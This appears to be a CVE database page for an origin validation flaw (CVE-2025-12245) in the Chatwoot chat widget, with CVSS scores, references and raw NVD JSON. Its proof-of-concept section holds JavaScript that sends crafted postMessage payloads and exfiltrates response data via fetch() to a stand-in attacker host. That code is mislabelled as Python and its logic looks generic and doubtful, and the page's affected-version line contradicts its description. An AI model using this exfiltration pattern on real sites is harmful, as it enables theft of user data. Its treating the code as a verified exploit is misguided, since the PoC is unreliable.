CVE-2025-12245

Description

A vulnerability was identified in chatwoot up to 4.7.0. This vulnerability affects the function initPostMessageCommunication of the file app/javascript/sdk/IFrameHelper.js of the component Widget. The manipulation of the argument baseUrl leads to origin validation error. Remote exploitation of the attack is possible. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chatwoot:chatwoot:*:*:*:*:*:*:*:* - VULNERABLE

Chatwoot < 4.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-12245 PoC - Origin Validation Error in Chatwoot Widget // This PoC demonstrates how an attacker can exploit the origin validation error // in Chatwoot's IFrameHelper.js initPostMessageCommunication function const ATTACKER_DOMAIN = 'https://attacker-controlled-site.com'; const TARGET_CHATWOOT_URL = 'https://vulnerable-chatwoot-instance.com'; // Malicious payload to exploit origin validation error function exploitOriginValidation() { const iframe = document.createElement('iframe'); iframe.src = TARGET_CHATWOOT_URL + '/widget.js'; iframe.id = 'chatwoot-iframe'; document.body.appendChild(iframe); // Wait for iframe to load iframe.onload = function() { // Craft malicious postMessage with manipulated baseUrl const maliciousMessage = { event: 'loaded', payload: { // Manipulated baseUrl to bypass origin check baseUrl: ATTACKER_DOMAIN, websiteToken: 'YOUR_WEBSITE_TOKEN', locale: 'en', position: 'right', hideMessageBubble: false, setUserEnabled: true } }; // Send malicious message to iframe iframe.contentWindow.postMessage(maliciousMessage, '*'); // Listen for response (potential data exfiltration) window.addEventListener('message', function(event) { // Check if response contains sensitive data if (event.data && event.data.event) { console.log('Received response:', event.data); // Exfiltrate data to attacker server fetch(ATTACKER_DOMAIN + '/log?data=' + btoa(JSON.stringify(event.data))); } }); }; } // Execute exploit document.addEventListener('DOMContentLoaded', exploitOriginValidation); // Alternative: Direct exploitation without iframe function directExploit() { // Inject malicious baseUrl directly const exploitPayload = { event: 'set-user', payload: { identifier: '[email protected]', name: 'Attacker', email: '[email protected]', baseUrl: ATTACKER_DOMAIN // Manipulated origin } }; window.parent.postMessage(exploitPayload, '*'); // Receive and log any returned sensitive data window.addEventListener('message', function(e) { console.log('Data leak:', e.data); }); }

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12245
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12245
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12245/
[4] VulDB https://vuldb.com/cve/CVE-2025-12245
[5] https://hckwr.com/blog/multiple-vulnerabilities-in-chatwoot/
[6] https://vuldb.com/?ctiid.329916
[7] https://vuldb.com/?id.329916
[8] https://vuldb.com/?submit.673800

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12245", "sourceIdentifier": "[email protected]", "published": "2025-10-27T08:15:36.950", "lastModified": "2025-10-28T02:15:11.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in chatwoot up to 4.7.0. This vulnerability affects the function initPostMessageCommunication of the file app/javascript/sdk/IFrameHelper.js of the component Widget. The manipulation of the argument baseUrl leads to origin validation error. Remote exploitation of the attack is possible. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chatwoot:chatwoot:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.0", "matchCriteriaId": "64647564-7997-4E77-AE41-FA0698414129"}]}]}], "references": [{"url": "https://hckwr.com/blog/multiple-vulnerabilities-in-chatwoot/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329916", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329916", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673800", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}